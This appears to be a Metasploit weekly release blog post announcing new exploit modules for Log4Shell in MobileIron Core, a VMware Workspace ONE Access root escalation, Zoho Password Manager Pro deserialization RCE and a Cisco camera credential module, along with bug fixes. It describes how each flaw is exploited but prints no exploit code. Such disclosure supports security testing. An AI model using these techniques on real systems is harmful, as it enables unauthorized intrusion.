Metasploit Weekly Wrap-Up


## Log4Shell in MobileIron Core ![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/08/metasploit-ascii-1-2.png) Thanks to [jbaines-r7](<https://github.com/jbaines-r7>) we have yet another Log4Shell [exploit](<https://github.com/rapid7/metasploit-framework/pull/16837>). Similar to the other Log4Shell exploit modules, the exploit works by sending a JNDI string that once received by the server will be deserialized, resulting in unauthenticated remote code execution as the `tomcat` user. Vulnerable versions of MobileIron Core have been reported as [exploited](<https://www.mandiant.com/resources/mobileiron-log4shell-exploitation>) in the wild. ## VMware Workspace ONE Access LPE Our very own [Spencer McIntyre](<https://github.com/zeroSteiner>) discovered and added a local privilege escalation [module](<https://github.com/rapid7/metasploit-framework/pull/16854>) for [CVE-2022-31660](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>) in VMware Workspace ONE Access. By default, the `horizon` user has write permissions to the `/opt/vmware/certproxy/bin/cert-proxy.sh` script, and the `sudo` configuration does not require supplying a password when invoking the script. Due to this, an attacker can write arbitrary code to the `/opt/vmware/certproxy/bin/cert-proxy.sh` script and escalate their privileges to that of the `root` user by executing the `certproxyService.sh` with `sudo`. Because the `horizon` user runs the externally-facing web application in VMware Workspace ONE Access, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) can be leveraged for initial access to the target. ## XML-RPC Unauthenticated RCE in Zoho Password Manager [Grant Willcox](<https://github.com/gwillcox-r7>) of the Metasploit team added a [module](<https://github.com/rapid7/metasploit-framework/pull/16852>) that exploits a deserialization flaw in Zoho Password Manager Pro. Sending a single POST request containing XML-RPC data to the `/xmlrpc` endpoint will result in unauthenticated code execution as `NT AUTHORITY\SYSTEM`. ## New module content (5) * [Cisco PVC2300 POE Video Camera configuration download](<https://github.com/rapid7/metasploit-framework/pull/16857>) by Craig Heffner and Erik Wynter - This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials. * [BACnet Scanner](<https://github.com/rapid7/metasploit-framework/pull/16788>) by Paz - This adds a new scanner module that discovers BACnet devices on the network and extracts model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local xml file. * [MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16837>) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) \- This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user. * [VMware Workspace ONE Access CVE-2022-31660](<https://github.com/rapid7/metasploit-framework/pull/16854>) by Spencer McIntyre, which exploits [CVE-2022-31660](<https://attackerkb.com/topics/GUT2CbttnF/cve-2022-31660?referrer=blog>) \- This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root. * [Zoho Password Manager Pro XML-RPC Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/16852>) by Grant Willcox, Vinicius, and Y4er, which exploits [CVE-2022-35405](<https://attackerkb.com/topics/9IKNFYh9Wl/cve-2022-35405?referrer=blog>) \- This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM. ## Enhancements and features (3) * [#16833](<https://github.com/rapid7/metasploit-framework/pull/16833>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \- This PR adds an option to the host command to make it easier to delete host tags. * [#16840](<https://github.com/rapid7/metasploit-framework/pull/16840>) from [bcoles](<https://github.com/bcoles>) \- This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list and load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts. * [#16858](<https://github.com/rapid7/metasploit-framework/pull/16858>) from [adfoster-r7](<https://github.com/adfoster-r7>) \- This updates ZeroLogon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message. ## Bugs fixed (8) * [#16820](<https://github.com/rapid7/metasploit-framework/pull/16820>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \- This PR fixes an issue in the ldap_query module where if the datastore option "action" wasn't set the module would fail. * [#16822](<https://github.com/rapid7/metasploit-framework/pull/16822>) from [adfoster-r7](<https://github.com/adfoster-r7>) \- This fixes a bug in `Rex::Ui::Text::Input::Buffer::BufferSock` that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly. * [#16825](<https://github.com/rapid7/metasploit-framework/pull/16825>) from [rbowes-r7](<https://github.com/rbowes-r7>) \- The IMAP credential capture module did not appropriately handle literal strings as specified by RFC3501. The code has been updated to handle these strings efficiently. * [#16832](<https://github.com/rapid7/metasploit-framework/pull/16832>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \- This fix removes an unnecessary echo statement from the ms10_092_schelevator module. * [#16839](<https://github.com/rapid7/metasploit-framework/pull/16839>) from [bcoles](<https://github.com/bcoles>) \- Fixes shell_registry_enumvals/getvaldata error checking. * [#16844](<https://github.com/rapid7/metasploit-framework/pull/16844>) from [bcoles](<https://github.com/bcoles>) \- This PR updates the `post/multi/gather` module to support non-meterpreter sessions like shell and powershell. * [#16846](<https://github.com/rapid7/metasploit-framework/pull/16846>) from [jmartin-r7](<https://github.com/jmartin-r7>) \- Updates `auxiliary/scanner/ssh/ssh_login` to gracefully handle `Errno::EPIPE` exceptions. * [#16848](<https://github.com/rapid7/metasploit-framework/pull/16848>) from [jmartin-r7](<https://github.com/jmartin-r7>) \- Fix a crash when updating session information in Meterpreter. ## Get it As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub: * [Pull Requests 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-07-29T13%3A06%3A04-05%3A00..2022-08-04T11%3A39%3A27-05%3A00%22>) * [Full diff 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/compare/6.2.10...6.2.11>) If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).